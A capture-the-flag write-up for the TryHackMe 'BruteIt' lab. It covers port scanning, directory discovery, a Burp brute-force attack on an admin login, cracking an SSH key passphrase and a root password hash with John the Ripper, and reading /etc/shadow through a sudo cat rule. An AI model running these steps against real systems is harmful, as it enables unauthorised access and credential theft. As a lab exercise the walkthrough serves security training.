# CTF TryHackMe - BruteIt

## Nmap

```bash
nmap -sC -sV  -oN nmap.log 10.10.190.85 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-27 11:59 EDT
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.64% done; ETC: 12:00 (0:00:00 remaining)
Nmap scan report for 10.10.190.85
Host is up (0.065s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds
```

We can see 2 open ports :
- 80
- 22

## Gobuster
```bash
gobuster dir -u 10.10.190.85 -w /usr/share/wordlists/dirb/big.txt
/admin                (Status: 301) [Size: 312] [--> http://10.10.190.85/admin/]
```
We discover the admin directory, go to **http://10.10.190.85/admin**
This is an admin login page.
In the source code we can see :
```
Hey john, if you do not remember, the username is admin
```
So, we have the username to use. Let's bruteforcing with burp

```
1. Intercept the post request

2. Send to intruder

3. Clear all field

4. Add field to pass (to fuzz the password)

POST /admin/ HTTP/1.1
Host: 10.10.190.85
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://10.10.190.85
Connection: close
Referer: http://10.10.190.85/admin/
Cookie: PHPSESSID=56esmf9feupj5lep3ec8s49ojp
Upgrade-Insecure-Requests: 1

user=admin&pass=§password§

5. In the payload page, browse rockyou.txt and start attack
```

And we get the password (response 302)

## Connect to the admin page

We can login with :
```
admin:xavier
```

Get the RSA private key of john, but need the passphrase to login with ssh...

## Using ssh2john and john

First, using ssh2john to get hash of private key
```bash
python /usr/share/john/ssh2john.py rsa_john > rsa_john.hash
```

Secondly, using john to crack the hash
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt rsa_john.hash 
rockinroll       (rsa_john)
```

## SSH access

Now we can get ssh access

```bash
ssh -i rsa_john john@10.10.184.108
```

## Privilege escalation

Check sudo permissions

```bash
sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
```

We can see the root password in shadow file
```bash
sudo /bin/cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999
:7:::
```

using john to crack this hash
```bash
echo "root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999
:7:::" > root.hash

john --wordlist=/usr/share/wordlists/rockyou.txt root.hash
football         (root)
```

We can get root access
```bash
su - 
football
```
